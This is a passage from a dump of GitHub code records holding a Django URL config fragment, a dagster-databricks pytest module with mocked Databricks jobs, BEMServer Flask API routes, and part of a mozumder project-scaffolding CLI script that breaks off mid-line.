url(r'^admin/', include(admin.site.urls)),\n url(r'^my_admin/jsi18n', 'django.views.i18n.javascript_catalog'),\n\n\n #User authentication\n url(r'^accounts/login/$', 'fitness.views.login'),\n url(r'^accounts/auth/$', 'fitness.views.auth_view'),\n url(r'^accounts/logout/$', 'fitness.views.logout'),\n url(r'^accounts/loggedin/$', 'fitness.views.loggedin'),\n url(r'^accounts/invalid/$', 'fitness.views.invalid_login'),\n url(r'^accounts/register/$', 'fitness.views.register_user'),\n url(r'^accounts/register_success/$', 'fitness.views.register_success'),\n\n)\n","repo_name":"kickdrumventures/fitness","sub_path":"fitness/fitness/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892220727","text":"import os\nfrom typing import Dict\nfrom unittest import mock\n\nimport pytest\nfrom dagster import In, Out, execute_job, fs_io_manager, graph, op, reconstructable\nfrom dagster._core.definitions.no_step_launcher import no_step_launcher\nfrom dagster._core.test_utils import instance_for_test\nfrom dagster._utils.merger import deep_merge_dicts\nfrom dagster_aws.s3 import s3_pickle_io_manager, s3_resource\nfrom dagster_azure.adls2 import adls2_pickle_io_manager, adls2_resource\nfrom dagster_databricks import (\n databricks_pyspark_step_launcher,\n)\nfrom dagster_databricks.types import (\n DatabricksRunLifeCycleState,\n DatabricksRunResultState,\n DatabricksRunState,\n)\nfrom dagster_pyspark import DataFrame, pyspark_resource\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import IntegerType, StringType, StructField, StructType\n\nS3_BUCKET = \"dagster-databricks-tests\"\nADLS2_STORAGE_ACCOUNT = \"dagsterdatabrickstests\"\nADLS2_CONTAINER = \"dagster-databricks-tests\"\n\n\nBASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG: Dict[str, object] = {\n \"databricks_host\": os.environ.get(\"DATABRICKS_HOST\") or \"https://\",\n \"databricks_token\": os.environ.get(\"DATABRICKS_TOKEN\"),\n \"local_job_package_path\": os.path.abspath(os.path.dirname(__file__)),\n \"staging_prefix\": \"/dagster-databricks-tests\",\n \"run_config\": {\n \"cluster\": {\n \"new\": {\n \"size\": {\"num_workers\": 1},\n \"spark_version\": \"6.5.x-scala2.11\",\n \"nodes\": {\n \"node_types\": {\"node_type_id\": \"Standard_DS3_v2\"},\n },\n },\n },\n \"libraries\": [\n {\"pypi\": {\"package\": \"azure-storage-file-datalake~=12.0.1\"}},\n {\"pypi\": {\"package\": \"dagster-aws\"}},\n {\"pypi\": {\"package\": \"dagster-azure\"}},\n {\"pypi\": {\"package\": \"databricks-api\"}},\n {\"pypi\": {\"package\": \"pytest\"}},\n ],\n },\n \"permissions\": {\n \"cluster_permissions\": {\"CAN_MANAGE\": [{\"group_name\": \"my_group\"}]},\n \"job_permissions\": {\"CAN_MANAGE_RUN\": [{\"user_name\": \"my_user\"}]},\n },\n \"secrets_to_env_variables\": [],\n \"env_variables\": {},\n \"storage\": {\n \"s3\": {\n \"secret_scope\": \"dagster-databricks-tests\",\n \"access_key_key\": \"aws-access-key\",\n \"secret_key_key\": \"aws-secret-key\",\n }\n },\n}\n\n\n@op(\n out=Out(dagster_type=DataFrame),\n required_resource_keys={\"pyspark_step_launcher\", \"pyspark\"},\n)\ndef make_df_op(context):\n schema = StructType([StructField(\"name\", StringType()), StructField(\"age\", IntegerType())])\n rows = [\n Row(name=\"John\", age=19),\n Row(name=\"Jennifer\", age=29),\n Row(name=\"Henry\", age=50),\n ]\n return context.resources.pyspark.spark_session.createDataFrame(rows, schema)\n\n\n@op(\n name=\"blah\",\n description=\"this is a test\",\n config_schema={\"foo\": str, \"bar\": int},\n ins={\"people\": In(dagster_type=DataFrame)},\n out=Out(dagster_type=DataFrame),\n required_resource_keys={\"pyspark_step_launcher\"},\n)\ndef filter_df_op(_, people):\n return people.filter(people[\"age\"] < 30)\n\n\nADLS2_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": databricks_pyspark_step_launcher,\n \"pyspark\": pyspark_resource,\n \"adls2\": adls2_resource,\n \"io_manager\": adls2_pickle_io_manager,\n}\nS3_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": databricks_pyspark_step_launcher,\n \"pyspark\": pyspark_resource,\n \"s3\": s3_resource,\n \"io_manager\": s3_pickle_io_manager,\n}\nTEST_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": databricks_pyspark_step_launcher,\n \"pyspark\": pyspark_resource,\n \"io_manager\": fs_io_manager,\n}\nLOCAL_RESOURCE_DEFS = {\n \"pyspark_step_launcher\": no_step_launcher,\n \"pyspark\": pyspark_resource,\n}\n\n\n@graph\ndef pyspark_graph():\n filter_df_op(make_df_op())\n\n\npyspark_local_job = pyspark_graph.to_job(resource_defs=LOCAL_RESOURCE_DEFS)\npyspark_s3_job = pyspark_graph.to_job(resource_defs=S3_RESOURCE_DEFS)\npyspark_adls2_job = pyspark_graph.to_job(resource_defs=ADLS2_RESOURCE_DEFS)\n\n\ndef define_pyspark_local_job():\n return pyspark_local_job\n\n\ndef define_pyspark_s3_job():\n return pyspark_s3_job\n\n\ndef define_pyspark_adls2_job():\n return pyspark_adls2_job\n\n\n@op(\n required_resource_keys={\"pyspark_step_launcher\", \"pyspark\"},\n)\ndef do_nothing_op(_):\n pass\n\n\n@graph\ndef do_nothing_graph():\n do_nothing_op()\n\n\ndo_nothing_local_job = do_nothing_graph.to_job(resource_defs=LOCAL_RESOURCE_DEFS)\ndo_nothing_test_job = do_nothing_graph.to_job(resource_defs=TEST_RESOURCE_DEFS)\n\n\ndef define_do_nothing_test_job():\n return do_nothing_test_job\n\n\ndef test_local():\n result = pyspark_local_job.execute_in_process(\n run_config={\n \"ops\": {\n \"blah\": {\"config\": {\"foo\": \"a string\", \"bar\": 123}},\n }\n }\n )\n assert result.success\n\n\n@mock.patch(\"databricks.sdk.core.Config\")\n@mock.patch(\"databricks.sdk.JobsAPI.submit\")\n@mock.patch(\"dagster_databricks.databricks.DatabricksClient.read_file\")\n@mock.patch(\"dagster_databricks.databricks.DatabricksClient.put_file\")\n@mock.patch(\"dagster_databricks.DatabricksPySparkStepLauncher.get_step_events\")\n@mock.patch(\"databricks.sdk.JobsAPI.get_run\")\n@mock.patch(\"dagster_databricks.databricks.DatabricksClient.get_run_state\")\n@mock.patch(\"databricks.sdk.core.ApiClient.do\")\ndef test_pyspark_databricks(\n mock_perform_query,\n mock_get_run_state,\n mock_get_run,\n mock_get_step_events,\n mock_put_file,\n mock_read_file,\n mock_submit_run,\n mock_config,\n):\n mock_submit_run_response = mock.Mock()\n mock_submit_run_response.bind.return_value = {\"run_id\": 12345}\n mock_submit_run.return_value = mock_submit_run_response\n mock_read_file.return_value = \"somefilecontents\".encode()\n\n running_state = DatabricksRunState(DatabricksRunLifeCycleState.RUNNING, None, \"\")\n final_state = DatabricksRunState(\n DatabricksRunLifeCycleState.TERMINATED, DatabricksRunResultState.SUCCESS, \"\"\n )\n mock_get_run_state.side_effect = [running_state] * 5 + [final_state]\n\n with instance_for_test() as instance:\n result = do_nothing_local_job.execute_in_process(instance=instance)\n mock_get_step_events.return_value = [\n event for event in instance.all_logs(result.run_id) if event.step_key == \"do_nothing_op\"\n ]\n\n # Test 1 - successful execution\n\n with instance_for_test() as instance:\n config = BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG.copy()\n config.pop(\"local_job_package_path\")\n result = execute_job(\n job=reconstructable(define_do_nothing_test_job),\n instance=instance,\n run_config={\n \"resources\": {\n \"pyspark_step_launcher\": {\n \"config\": deep_merge_dicts(\n config,\n {\n \"databricks_host\": \"https://\",\n \"databricks_token\": \"\",\n \"poll_interval_sec\": 0.1,\n \"local_dagster_job_package_path\": os.path.abspath(\n os.path.dirname(__file__)\n ),\n },\n ),\n },\n },\n \"execution\": {\"config\": {\"in_process\": {}}},\n },\n )\n assert result.success\n assert mock_perform_query.call_count == 2\n assert mock_get_run.call_count == 1\n assert mock_get_run_state.call_count == 6\n assert mock_get_step_events.call_count == 6\n assert mock_put_file.call_count == 4\n assert mock_read_file.call_count == 2\n assert mock_submit_run.call_count == 1\n\n # Test 2 - attempting to update permissions for an existing cluster\n\n with instance_for_test() as instance:\n config = BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG.copy()\n config.pop(\"local_job_package_path\")\n config[\"run_config\"][\"cluster\"] = {\"existing\": \"cluster_id\"}\n with pytest.raises(ValueError) as excinfo:\n execute_job(\n job=reconstructable(define_do_nothing_test_job),\n instance=instance,\n run_config={\n \"resources\": {\n \"pyspark_step_launcher\": {\n \"config\": deep_merge_dicts(\n config,\n {\n \"databricks_host\": \"https://\",\n \"databricks_token\": \"\",\n \"poll_interval_sec\": 0.1,\n \"local_dagster_job_package_path\": os.path.abspath(\n os.path.dirname(__file__)\n ),\n },\n ),\n },\n },\n \"execution\": {\"config\": {\"in_process\": {}}},\n },\n raise_on_error=True,\n )\n\n assert (\n str(excinfo.value)\n == \"Attempting to update permissions of an existing cluster. This is dangerous and\"\n \" thus unsupported.\"\n )\n\n\n@pytest.mark.skipif(\n \"DATABRICKS_TEST_DO_IT_LIVE_S3\" not in os.environ,\n reason=\"This test is slow and requires a Databricks cluster; run only upon explicit request\",\n)\ndef test_do_it_live_databricks_s3():\n result = execute_job(\n reconstructable(define_pyspark_s3_job),\n run_config={\n \"ops\": {\"blah\": {\"config\": {\"foo\": \"a string\", \"bar\": 123}}},\n \"resources\": {\n \"pyspark_step_launcher\": {\"config\": BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG},\n \"io_manager\": {\n \"config\": {\n \"s3_bucket\": \"elementl-databricks\",\n \"s3_prefix\": \"dagster-test\",\n }\n },\n },\n },\n )\n assert result.success\n\n\n@pytest.mark.skipif(\n \"DATABRICKS_TEST_DO_IT_LIVE_ADLS2\" not in os.environ,\n reason=\"This test is slow and requires a Databricks cluster; run only upon explicit request\",\n)\ndef test_do_it_live_databricks_adls2():\n config = BASE_DATABRICKS_PYSPARK_STEP_LAUNCHER_CONFIG.copy()\n config[\"storage\"] = {\n \"adls2\": {\n \"secret_scope\": \"dagster-databricks-tests\",\n \"storage_account_name\": ADLS2_STORAGE_ACCOUNT,\n \"storage_account_key_key\": \"adls2-storage-key\",\n }\n }\n\n result = execute_job(\n reconstructable(define_pyspark_adls2_job),\n run_config={\n \"ops\": {\"blah\": {\"config\": {\"foo\": \"a string\", \"bar\": 123}}},\n \"resources\": {\n \"pyspark_step_launcher\": {\"config\": config},\n \"adls2\": {\n \"config\": {\n \"storage_account\": ADLS2_STORAGE_ACCOUNT,\n \"credential\": {\"key\": os.environ.get(\"AZURE_STORAGE_ACCOUNT_KEY\")},\n }\n },\n \"io_manager\": {\n \"config\": {\n \"adls2_file_system\": ADLS2_CONTAINER,\n \"adls2_prefix\": \"dagster-databricks-tests\",\n }\n },\n },\n },\n )\n assert result.success\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-databricks/dagster_databricks_tests/test_pyspark.py","file_name":"test_pyspark.py","file_ext":"py","file_size_in_byte":11429,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"33156731568","text":"\"\"\"Energy production timeseries by buildings resources\"\"\"\nfrom flask.views import MethodView\nfrom flask_smorest import abort\n\nfrom bemserver_core.model import EnergyProductionTimeseriesByBuilding\n\nfrom bemserver_api import Blueprint\nfrom bemserver_api.database import db\n\nfrom .schemas import (\n EnergyProductionTimeseriesByBuildingSchema,\n EnergyProductionTimeseriesByBuildingQueryArgsSchema,\n)\n\n\nblp = Blueprint(\n \"EnergyProductionTimeseriesByBuilding\",\n __name__,\n url_prefix=\"/energy_production_timeseries_by_buildings\",\n description=\"Operations on energy production timeseries x building associations\",\n)\n\n\n@blp.route(\"/\")\nclass EnergyProductionTimeseriesByBuildingViews(MethodView):\n @blp.login_required\n @blp.etag\n @blp.arguments(\n EnergyProductionTimeseriesByBuildingQueryArgsSchema, location=\"query\"\n )\n @blp.response(200, EnergyProductionTimeseriesByBuildingSchema(many=True))\n def get(self, args):\n \"\"\"List energy production timeseries x building associations\"\"\"\n return EnergyProductionTimeseriesByBuilding.get(**args)\n\n @blp.login_required\n @blp.etag\n @blp.arguments(EnergyProductionTimeseriesByBuildingSchema)\n @blp.response(201, EnergyProductionTimeseriesByBuildingSchema)\n @blp.catch_integrity_error\n def post(self, new_item):\n \"\"\"Add a new energy production timeseries x building association\"\"\"\n item = EnergyProductionTimeseriesByBuilding.new(**new_item)\n db.session.commit()\n return item\n\n\n@blp.route(\"/\")\nclass EnergyProductionTimeseriesByBuildingByIdViews(MethodView):\n @blp.login_required\n @blp.etag\n @blp.response(200, EnergyProductionTimeseriesByBuildingSchema)\n def get(self, item_id):\n \"\"\"Get energy production timeseries x building association by ID\"\"\"\n item = EnergyProductionTimeseriesByBuilding.get_by_id(item_id)\n if item is None:\n abort(404)\n return item\n\n @blp.login_required\n @blp.etag\n @blp.arguments(EnergyProductionTimeseriesByBuildingSchema)\n @blp.response(200, EnergyProductionTimeseriesByBuildingSchema)\n @blp.catch_integrity_error\n def put(self, new_item, item_id):\n \"\"\"Update an existing energy production timeseries x building association\"\"\"\n item = EnergyProductionTimeseriesByBuilding.get_by_id(item_id)\n if item is None:\n abort(404)\n blp.check_etag(item, EnergyProductionTimeseriesByBuildingSchema)\n item.update(**new_item)\n db.session.commit()\n return item\n\n @blp.login_required\n @blp.etag\n @blp.response(204)\n def delete(self, item_id):\n \"\"\"Delete a energy production timeseries x building association\"\"\"\n item = EnergyProductionTimeseriesByBuilding.get_by_id(item_id)\n if item is None:\n abort(404)\n blp.check_etag(item, EnergyProductionTimeseriesByBuildingSchema)\n item.delete()\n db.session.commit()\n","repo_name":"BEMServer/bemserver-api","sub_path":"bemserver_api/resources/energy_production_timeseries_by_buildings/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44722200955","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport subprocess\nimport site\nfrom shutil import copyfile\nimport argparse\nfrom urllib.parse import urlparse\n#from virtualenv import cli_run\nimport venv\n\nimport django\nfrom django.utils.version import get_docs_version\nfrom django.core.management.utils import get_random_secret_key\n\nimport mozumder\n\ndef create():\n parser = argparse.ArgumentParser(\n description='Create a new Mozumder project.')\n subparsers = parser.add_subparsers(help='Create new project, or create UWSGI vassals file', dest='subparser_name')\n parser_startproject = subparsers.add_parser('startproject', help='Create a new Mozumder project')\n parser_uwsgi = subparsers.add_parser('createuwsgi', help='Create a UWSGI Vassal .ini file')\n parser_h2o = subparsers.add_parser('createh2o', help='Create h2o config file')\n\n parser.add_argument(\n 'project_name',\n action='store',\n help='Name of project. Project directory will be created with this name.')\n\n parser_startproject.set_defaults(func=startproject)\n parser_uwsgi.set_defaults(func=createuwsgi)\n parser_h2o.set_defaults(func=createh2o)\n\n parser_startproject.add_argument(\n '--db_url',\n action='store',\n help='Database connection URL in the format: postgresql://[user[:password]@][netloc][:port][/dbname][?param1=value1&...]')\n parser_startproject.add_argument(\n '--db_name',\n action='store',\n default='project_name',\n help='When not using a database URL, name of database to connect to')\n parser_startproject.add_argument(\n '--db_host',\n action='store',\n help='When not using a database URL, hostname or IP address of database server')\n parser_startproject.add_argument(\n '--db_port',\n action='store',\n help='When not using a database URL, port number of database server')\n parser_startproject.add_argument(\n '--db_user_name',\n action='store',\n help='When not using a database URL, username to connect to the database')\n parser_startproject.add_argument(\n '--db_user_password',\n action='store',\n help='When not using a database URL, password of user connecting to the database')\n parser_startproject.add_argument(\n '--allowed_hosts',\n nargs='*',\n action='store',\n default=['127.0.0.1'],\n help='Comma separated lists of hosts that are allowed to accept connections for the site. Default to: 127.0.0.1')\n parser_startproject.add_argument(\n '--log_dir',\n action='store',\n default='log',\n help='Django log directory. Default to: log')\n parser_startproject.add_argument(\n '--static_dir',\n action='store',\n default='static',\n help='Static files directory. Default to: static')\n parser_startproject.add_argument(\n '--media_dir',\n action='store',\n default='media',\n help='Django log directory. Default to: media')\n parser_startproject.add_argument(\n '--static_url',\n action='store',\n default='static',\n help='Static files URL path. Default to: static')\n parser_startproject.add_argument(\n '--media_url',\n action='store',\n default='media',\n help='Media files URL path. Default to: media')\n parser_startproject.add_argument(\n '--admin_url',\n action='store',\n default='admin',\n help='Admin URL path. Default to: admin')\n parser_startproject.add_argument(\n '--virtualenv_dir',\n action='store',\n default='venv',\n help='Python virtualenv directory. Default to: venv')\n parser_startproject.add_argument(\n '--develop_path',\n action='store',\n default='venv',\n help='Use django-mozumder in developer mode by providing path to source tree.')\n parser_startproject.add_argument(\n '--site_name',\n action='store',\n default='Mozumder Website',\n help='Full Name of site. Default: \"Mozumder Website\"')\n parser_startproject.add_argument(\n '--site_short_name',\n action='store',\n default='Mozumder',\n help='Short Name of site. Default: Mozumder')\n parser_startproject.add_argument(\n '--site_description',\n action='store',\n default='A new website',\n help='Site description. Default: \"A new website\"')\n parser_startproject.add_argument(\n '--site_lang',\n action='store',\n default='en-US',\n help='Site default language. Default: en-US')\n parser_startproject.add_argument(\n '--site_theme_color',\n action='store',\n default='black',\n help='Site theme color. Default: black')\n parser_startproject.add_argument(\n '--site_background_color',\n action='store',\n default='pink',\n help='Site theme color. Default: pink')\n parser_startproject.add_argument(\n '--hostname',\n action='store',\n help='Full Host name for HTTP server. Example: www.example.com')\n parser_startproject.add_argument(\n '--domainname',\n action='store',\n help='Top-level domain name for this server. This will be permanently redirected to the server hostname. Example: example.com')\n parser_startproject.add_argument(\n '--redirects',\n action='store',\n help='List of additional domains that will be temporarily redirected to this HTTP host. Example: host1.example.com host2.example.com')\n parser_startproject.add_argument(\n '--letsencrypt_dir',\n action='store',\n default='/usr/local/etc/letsencrypt/live',\n help='Letsencrypt live key directory. Default to: /usr/local/etc/letsencrypt/live')\n parser_startproject.add_argument(\n '--h2o_log_dir',\n action='store',\n default='/var/log/h2o',\n help='H2O log directory. Default to: /var/log/uwsgi')\n parser_startproject.add_argument(\n '--uwsgi_http_sockets',\n nargs='*',\n action='store',\n default=['127.0.0.1:8010'],\n help='Comma separated list of additional UWSGI HTTP sockets. Connect to these for debugging purposes without going through the main HTTP reverse proxy web server. Make sure these are only accessible in your debug environment. Default to: 127.0.0.1:8010')\n parser_startproject.add_argument(\n '--uwsgi_processes',\n action='store',\n default=1,\n type=int,\n help='Number of UWSGI processes to run. Default 1.')\n parser_startproject.add_argument(\n '--uwsgi_threads',\n action='store',\n default=8,\n type=int,\n help='Number of threads per UWSGI process to run. Default 8.')\n parser_startproject.add_argument(\n '--uwsgi_run_dir',\n action='store',\n default='/var/run/uwsgi',\n help='UWSGI run directory for temporary run files. Default to: /var/run/uwsgi')\n parser_startproject.add_argument(\n '--uwsgi_log_dir',\n action='store',\n default='/var/log/uwsgi',\n help='UWSGI log directory. Default to: /var/log/uwsgi')\n parser_startproject.add_argument(\n '--create_db',\n action='store_true',\n help='Create Postgres user and database')\n parser_startproject.add_argument(\n '--db_admin_url',\n action='store',\n default='postgresql://postgres@127.0.0.1',\n help='Postgresql Admin database connection URL. This will be used to log in and create the new project database and user. Only uses username and password information. Database connection URL in the format: postgresql://[user[:password]@][netloc][:port][/dbname][?param1=value1&...]')\n parser_startproject.add_argument(\n '--db_admin_name',\n action='store',\n help='When not using an database admin URL, admin username to connect to the database')\n parser_startproject.add_argument(\n '--db_admin_password',\n action='store',\n help='When not using an database admin URL, password of admin connecting to the database')\n parser_startproject.add_argument(\n '--create_uwsgi',\n action='store_true',\n default=False,\n help='Create a UWSGI vassals file.')\n parser_startproject.add_argument(\n '--create_h2o',\n action='store_true',\n default=False,\n help='Create h2o config file.')\n parser_startproject.add_argument(\n '--create_venv',\n action='store_true',\n default=False,\n help='Create Python Virtualenv.')\n\n\n parser_uwsgi.add_argument(\n '--db_url',\n action='store',\n help='Database connection URL in the format: postgresql://[user[:password]@][netloc][:port][/dbname][?param1=value1&...]')\n parser_uwsgi.add_argument(\n '--db_name',\n action='store',\n default='project_name',\n help='When not using a database URL, name of database to connect to')\n parser_uwsgi.add_argument(\n '--db_host',\n action='store',\n help='When not using a database URL, hostname or IP address of database server')\n parser_uwsgi.add_argument(\n '--db_port',\n action='store',\n help='When not using a database URL, port number of database server')\n parser_uwsgi.add_argument(\n '--db_user_name',\n action='store',\n help='When not using a database URL, username to connect to the database')\n parser_uwsgi.add_argument(\n '--db_user_password',\n action='store',\n help='When not using a database URL, password of user connecting to the database')\n parser_uwsgi.add_argument(\n '--allowed_hosts',\n nargs='*',\n action='store',\n default=['127.0.0.1'],\n help='Comma separated lists of hosts that are allowed to accept connections for the site. Default to: 127.0.0.1')\n parser_uwsgi.add_argument(\n '--log_dir',\n action='store',\n default='log',\n help='Django log directory. Default to: log')\n parser_uwsgi.add_argument(\n '--static_dir',\n action='store',\n default='static',\n help='Static files directory. Default to: static')\n parser_uwsgi.add_argument(\n '--media_dir',\n action='store',\n default='media',\n help='Django log directory. Default to: media')\n parser_uwsgi.add_argument(\n '--static_url',\n action='store',\n default='static',\n help='Static files URL path. Default to: static')\n parser_uwsgi.add_argument(\n '--media_url',\n action='store',\n default='media',\n help='Media files URL path. Default to: media')\n parser_uwsgi.add_argument(\n '--admin_url',\n action='store',\n default='admin',\n help='Admin URL path. Default to: admin')\n parser_uwsgi.add_argument(\n '--virtualenv_dir',\n action='store',\n default='venv',\n help='Python virtualenv directory. Default to: venv')\n parser_uwsgi.add_argument(\n '--develop_path',\n action='store',\n default='venv',\n help='Use django-mozumder in developer mode by providing path to source tree.')\n parser_uwsgi.add_argument(\n '--site_name',\n action='store',\n default='Mozumder Website',\n help='Full Name of site. Default: \"Mozumder Website\"')\n parser_uwsgi.add_argument(\n '--site_short_name',\n action='store',\n default='Mozumder',\n help='Short Name of site. Default: Mozumder')\n parser_uwsgi.add_argument(\n '--site_description',\n action='store',\n default='A new website',\n help='Site description. Default: \"A new website\"')\n parser_uwsgi.add_argument(\n '--site_lang',\n action='store',\n default='en-US',\n help='Site default language. Default: en-US')\n parser_uwsgi.add_argument(\n '--site_theme_color',\n action='store',\n default='black',\n help='Site theme color. Default: black')\n parser_uwsgi.add_argument(\n '--site_background_color',\n action='store',\n default='pink',\n help='Site theme color. Default: pink')\n parser_uwsgi.add_argument(\n '--hostname',\n action='store',\n help='Full Host name for HTTP server. Example: www.example.com')\n parser_uwsgi.add_argument(\n '--domainname',\n action='store',\n help='Top-level domain name for this server. This will be permanently redirected to the server hostname. Example: example.com')\n parser_uwsgi.add_argument(\n '--redirects',\n action='store',\n help='List of additional domains that will be temporarily redirected to this HTTP host. Example: host1.example.com host2.example.com')\n parser_uwsgi.add_argument(\n '--letsencrypt_dir',\n action='store',\n default='/usr/local/etc/letsencrypt/live',\n help='Letsencrypt live key directory. Default to: /usr/local/etc/letsencrypt/live')\n parser_uwsgi.add_argument(\n '--h2o_log_dir',\n action='store',\n default='/var/log/h2o',\n help='H2O log directory. Default to: /var/log/uwsgi')\n parser_uwsgi.add_argument(\n '--uwsgi_run_dir',\n action='store',\n default='/var/run/uwsgi',\n help='UWSGI run directory for temporary run files. Default to: /var/run/uwsgi')\n parser_uwsgi.add_argument(\n '--uwsgi_log_dir',\n action='store',\n default='/var/log/uwsgi',\n help='UWSGI log directory. Default to: /var/log/uwsgi')\n parser_uwsgi.add_argument(\n '--uwsgi_http_sockets',\n nargs='*',\n action='store',\n default=['127.0.0.1:8010'],\n help='Comma separated list of additional UWSGI HTTP sockets. Connect to these for debugging purposes without going through the main HTTP reverse proxy web server. Make sure these are only accessible in your debug environment. Default to: 127.0.0.1:8010')\n parser_uwsgi.add_argument(\n '--uwsgi_processes',\n action='store',\n default=1,\n type=int,\n help='Number of UWSGI processes to run. Default 1.')\n parser_uwsgi.add_argument(\n '--uwsgi_threads',\n action='store',\n default=8,\n type=int,\n help='Number of threads per UWSGI process to run. Default 8.')\n\n\n args = parser.parse_args()\n\n args.func(args)\n\ndef process_args(args):\n \n # Set some template variables from command line\n project_name = args.project_name\n db_url = args.db_url\n\n if db_url == None:\n db_host = args.db_host\n db_port = args.db_port if args.db_port else ''\n db_name = args.db_name\n db_username = args.db_user_name\n db_password = args.db_user_password\n else:\n o = urlparse(db_url)\n db_host = o.hostname\n db_port = o.port if o.port else ''\n db_name = o.path[1:]\n db_username = o.username\n db_password = o.password\n allowed_hosts = \",\".join(args.allowed_hosts)\n\n # Set some internally generated template variables\n secret_key = get_random_secret_key()\n django_version = django.__version__\n docs_version = get_docs_version()\n\n static_dir = args.static_dir\n media_dir = args.media_dir\n static_url = args.static_url\n media_url = args.media_url\n admin_url = args.admin_url\n log_dir = args.log_dir\n log_file = os.path.join(log_dir, f'{project_name}.log')\n error_log_file = os.path.join(log_dir, f'{project_name}.error.log')\n access_log_file = os.path.join(log_dir, f'{project_name}.access.log')\n cache_log_file = os.path.join(log_dir, f'{project_name}.cache.log')\n db_log_file = os.path.join(log_dir, f'{project_name}.db.log')\n\n # Get path by deleting '/__init__.py' from pathname\n source_root = os.path.join(mozumder.__file__[:-12], 'include','project_template')\n source_root_length = len(source_root)\n\n target_root = os.path.join(os.getcwd(),project_name)\n access_rights = 0o755\n log_path = os.path.join(target_root,log_dir)\n static_path = os.path.join(target_root,static_dir)\n media_path = os.path.join(target_root,media_dir)\n \n venv_name = args.virtualenv_dir + f'.{project_name}'\n venv_path = os.path.join(target_root,venv_name)\n venv_bin = os.path.join(venv_path, 'bin')\n python_bin = os.path.join(venv_path, 'bin', 'python')\n develop_path = args.develop_path.replace(' ', '\\ ')\n\n uwsgi_run_dir = args.uwsgi_run_dir\n uwsgi_log_dir = args.uwsgi_log_dir\n \n site_name = args.site_name\n site_short_name = args.site_short_name\n site_description = args.site_description\n site_lang = args.site_lang\n site_theme_color = args.site_theme_color\n site_background_color = args.site_background_color\n\n return project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color\n\ndef startproject(args):\n\n project_name, db_host, db_port, db_name, db_username, db_password, \\\n allowed_hosts, static_dir, media_dir, static_url, media_url, \\\n admin_url, log_dir, log_file, error_log_file, access_log_file, \\\n cache_log_file, db_log_file, secret_key, django_version, docs_version, \\\n source_root, source_root_length, target_root, access_rights, log_path, \\\n static_path, media_path, venv_name, venv_path, venv_bin, \\\n python_bin, develop_path, uwsgi_run_dir, uwsgi_log_dir, site_name, \\\n site_short_name, site_description, site_lang, site_theme_color, \\\n site_background_color = process_args(args)\n\n db_admin_url = args.db_admin_url\n\n if db_admin_url == None:\n db_admin_username = args.db_admin_name\n db_admin_password = args.db_admin_password\n else:\n o = urlparse(db_admin_url)\n db_admin_username = o.username\n db_admin_password = o.password\n\n try:\n os.mkdir(target_root, access_rights)\n except OSError:\n print (f\"Creation of project directory {target_root} failed\")\n else:\n print (f\"Created project directory {target_root}\")\n os.chdir(target_root)\n\n try:\n os.mkdir(log_path, access_rights)\n except OSError:\n print (f\"Creation of log directory {log_path} failed\")\n else:\n print (f\"Created project directory {log_path}\")\n\n media_path = os.path.join(target_root,media_dir)\n try:\n os.mkdir(media_path, access_rights)\n except OSError:\n print (f\"Creation of media files directory {media_path} failed\")\n else:\n print (f\"Created media files directory {media_path}\")\n\n\n for root, dirs, files in os.walk(source_root):\n # Process files from source templates directory and install\n # them in the new project directory\n sub_dir = root[source_root_length+1:].replace('project_name',project_name)\n target_path = os.path.join(target_root, sub_dir)\n for name in dirs:\n if name == 'project_name':\n name = project_name\n path = os.path.join(target_path, name)\n try:\n os.mkdir(path,mode=0o755)\n except OSError:\n print (f\"Creation of the directory {path} failed\")\n else:\n print (f\"Created directory {path}\")\n for name in files:\n source_filename = os.path.join(root, name)\n if name[-4:] == '-tpl':\n f = open(source_filename, \"r\")\n fstring_from_file = 'f\"\"\"'+f.read()+'\"\"\"'\n f.close()\n # Evaluate F-String\n compiled_fstring = compile(fstring_from_file, source_filename, 'eval')\n formatted_output = eval(compiled_fstring)\n name = name[:-4]\n target_filename = os.path.join(target_path, name)\n # Write evaluated F-String\n f = open(target_filename, \"w\")\n f.write(formatted_output)\n f.close()\n status = os.stat(source_filename).st_mode & 0o777\n os.chmod(target_filename,status)\n else:\n target_filename = os.path.join(target_path, name)\n copyfile(source_filename, target_filename)\n\n if args.create_venv == True:\n \n # Create new Python virtual environment with venv\n venv_builder = venv.EnvBuilder(with_pip=True)\n try:\n venv_builder.create(venv_path)\n except OSError:\n print (f\"Creation of Python Virtualenv {venv_name} failed\")\n else:\n print (f\"Created Python virtualenv {venv_name}\")\n\n # Activate new virtual environment in this script\n # prepend bin to PATH (this file is inside the bin directory)\n os.environ[\"PATH\"] = os.pathsep.join([venv_bin] + os.environ.get(\"PATH\", \"\").split(os.pathsep))\n os.environ[\"VIRTUAL_ENV\"] = venv_path # virtual env is right above bin directory\n\n # add the virtual environments libraries to the host python import mechanism\n prev_length = len(sys.path)\n for lib in f\"{venv_path}/lib/python3.8/site-packages\".split(os.pathsep):\n path = os.path.realpath(os.path.join(venv_bin, lib))\n site.addsitedir(path.decode(\"utf-8\") if \"\" else path)\n sys.path[:] = sys.path[prev_length:] + sys.path[0:prev_length]\n\n sys.real_prefix = sys.prefix\n sys.prefix = venv_path\n\n # Install Python 